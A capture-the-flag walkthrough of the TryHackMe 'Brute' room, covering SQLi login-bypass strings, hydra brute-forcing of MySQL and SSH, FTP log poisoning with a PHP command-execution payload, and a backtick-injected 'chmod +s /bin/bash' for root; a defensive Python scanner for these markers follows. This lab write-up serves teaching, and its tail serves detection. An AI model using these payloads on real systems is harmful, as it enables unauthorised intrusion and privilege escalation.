THM - BRUTE


Hi everyone,

Today we look at the Brute room, created by hadrian3689.

WE START!

We start the virtual machine, wait for it to boot and browse the website:

A login page; let's check the source code.

Nothing interesting. Let's try bypassing the login with a SQLi:

' OR 1 -- -
OR 1=1
admin' or '1'='1
admin' or '1'='1'--

Nothing. You can find more payloads here.

Let's search with dirb:

Nothing interesting.

We use nmap with the command: sudo nmap -sV -O -A -T4 <IP>

Interesting: ports 21 and 3306 are open, so FTP and MySQL.

Let's test FTP:

Nothing, no anonymous access.
So let's probe MySQL first with nmap's scripts: nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-enum

Hmm, the room is called Brute, so let's try hydra against MySQL with the root user and see if we have any luck!

We use the command: hydra -l root -P rockyou.txt <ip> mysql

It works! We have the root password for MySQL, let's log in!
Use: mysql -h <ip> -u root -p

Okay, now we know a username, Adrian, and we use John to crack the password hash.

Now that we have Adrian's password, let's connect via SSH!

It doesn't work, so let's try logging in to the website with these credentials.

Well, within the site there are not many options; let's click on Log and see what happens.

After some reflection I realize that I am reading the FTP logs.

Interesting, let's try poisoning the logs.
I log in to FTP and as the username I enter: '<?php system($_GET['p']); ?>'
I now go back to the site and add the parameter ?p=ls to the URL.

It works!
I open Burp.
Now I try a bash reverse shell, nothing; I try a Python one, nothing.
Then I think: let's try the Python one URL-encoded:

It works!

What does the html folder contain?

We open the config.php file and find the DB password of the adrian user, but it doesn't look interesting.
I still try this password to get a shell as that user, but it doesn't work.
I then move on.

Let's go into Adrian's home and check what files are there. Of course, we are logged in as www-data, so let's check which files we can open.

A cryptic message.

I think about it: there is a file with the most used rules in hashcat's /rules folder.
I then create a file containing 'ettubrute' and 'ettubrute!' and generate our wordlist with the command: hashcat --force password.txt -r /usr/share/hashcat/rules/best64.rule --stdout > listrule64.txt

We get back a list of candidate passwords derived from the words 'ettubrute' and 'ettubrute!'.

Now we try to find adrian's SSH password; again we use hydra:

Now we get access!

Well, let's look around.
In his folder we can now access and read the files:
- ftp (folder)
- punch_in
- punch_in.sh
- user.txt

Now let's look at the other files:

We have two scripts, a file that gets a log entry every minute, and a notes file.

From the .notes file we understand that the administrator wanted this punch-in function implemented; the developer is annoyed about it and wrote another script that regularly processes every line of punch_in. So, if that script runs as root, we might get commands executed as root by writing into the punch_in file.
The punch_in.sh script appends to the punch_in file every minute.
The script in /ftp/files reads the punch_in file.

I then edit the punch_in file and, as the last line, enter the command chmod +s /bin/bash, then wait a few minutes.

But the permissions of /bin/bash do not change; it doesn't work.

I try wrapping the command in backticks: `chmod +s /bin/bash`

It works!

Now we run /bin/bash -p (the -p flag stops bash from dropping the setuid privilege).

GGGGreat! Now let's find the flag.
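Both tricks used above, the PHP tag smuggled into the FTP log as a username and the backtick command substitution smuggled into punch_in, boil down to untrusted text being read back by something that interprets it. As an added example (mine, not part of the original write-up or the room), here is the check a defender would run over such files: it scans constructed vsftpd-style log lines and a constructed punch_in file for those markers.

```python
import re

# Constructed sample data (mine, not captured from the room). A vsftpd-style
# log in which one login attempt carries a PHP tag as the username, and a
# punch_in file in which one entry carries a backtick command substitution.
FTP_LOG = """\
Tue Mar  1 10:00:01 2022 [pid 1234] CONNECT: Client "10.0.0.5"
Tue Mar  1 10:00:03 2022 [pid 1233] [adrian] OK LOGIN: Client "10.0.0.5"
Tue Mar  1 10:00:09 2022 [pid 1235] [<?php system($_GET['p']); ?>] FAIL LOGIN: Client "10.0.0.5"
Tue Mar  1 10:00:15 2022 [pid 1236] [anonymous] FAIL LOGIN: Client "10.0.0.5"
"""

PUNCH_IN = """\
Tue Mar  1 10:00:01 2022 adrian punched in
Tue Mar  1 10:01:01 2022 adrian punched in
`chmod +s /bin/bash`
"""

# Markers that have no business in a username rendered by a PHP page, nor in
# a file that a root cron job later passes through a shell.
MARKERS = {
    "php-tag": re.compile(r"<\?(?:php\b|=)", re.IGNORECASE),
    "backtick-subst": re.compile(r"`[^`]*`"),
    "dollar-subst": re.compile(r"\$\([^)]*\)"),
}

def ftp_login_user(line):
    """Username of an OK/FAIL LOGIN line; None for CONNECT and other lines."""
    m = re.search(r"\[pid \d+\] \[(.*?)\] (?:OK|FAIL) LOGIN:", line)
    return m.group(1) if m else None

def scan_lines(text, extract=lambda line: line):
    """Return [(line_no, [marker names])] for each line whose extracted
    field (the whole line by default) matches at least one marker."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        field = extract(line)
        if field is None:
            continue
        hits = [name for name, rx in MARKERS.items() if rx.search(field)]
        if hits:
            findings.append((no, hits))
    return findings

if __name__ == "__main__":
    print("ftp log:", scan_lines(FTP_LOG, ftp_login_user))  # [(3, ['php-tag'])]
    print("punch_in:", scan_lines(PUNCH_IN))                # [(3, ['backtick-subst'])]
```

On the fixing side, the log viewer should HTML-escape the log text and never include() it as PHP, and the root cron job should treat punch_in lines as data (for example printf '%s\n' "$line") instead of passing them through a shell.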

To conclude:

  • enumeration with nmap and dirb
  • hydra to brute-force SSH and MySQL
  • John for cracking the hash
  • log poisoning to insert malicious PHP code
  • hashcat to build a wordlist for accessing services
  • code injection to escalate via SUID.

Really an interesting box, thank you THM!